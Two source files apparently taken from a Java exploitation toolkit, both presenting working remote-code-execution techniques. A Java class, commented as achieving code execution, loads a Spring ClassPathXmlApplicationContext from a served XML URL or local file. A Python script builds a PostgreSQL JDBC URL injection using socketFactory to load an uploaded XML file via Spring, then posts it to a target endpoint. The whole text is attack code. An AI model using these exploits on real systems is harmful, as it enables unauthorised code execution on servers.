File: Gadget/Sink/ClassPathXml/src/main/java/com/test/exp/ClassPathXml.java
package com.test.exp;

import org.springframework.context.support.ClassPathXmlApplicationContext;

// 利用加载Spring xml配置文件，实现代码执行
// 可以用java-chains生成xml
public class ClassPathXml {
    public static void main(String[] args) {
        String url = "http://127.0.0.1:7777/1.xml";
        ClassPathXmlApplicationContext http = new ClassPathXmlApplicationContext(url);
        url = "file:./1.xml";
        ClassPathXmlApplicationContext file = new ClassPathXmlApplicationContext(url);
    }
}

File: PyScript/JDBC/PostgreSql/ClassPathXml.py
import requests
from urllib import parse

url1 = parse.quote("jdbc:postgresql://localhost:5432/test?a=")
url2 = parse.quote("&socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=file:///${catalina.home}/**/*.tmp")

url = f"http://127.0.0.1:8081/jdbc?url={url1}&url={url2}"
print(url)


file = {"file": open("1.xml", "rb")}

proxy = {
    "http": "http://127.0.0.1:8080",
    "https": "http://127.0.0.1:8080"
}

response = requests.post(url, files=file, proxies=proxy)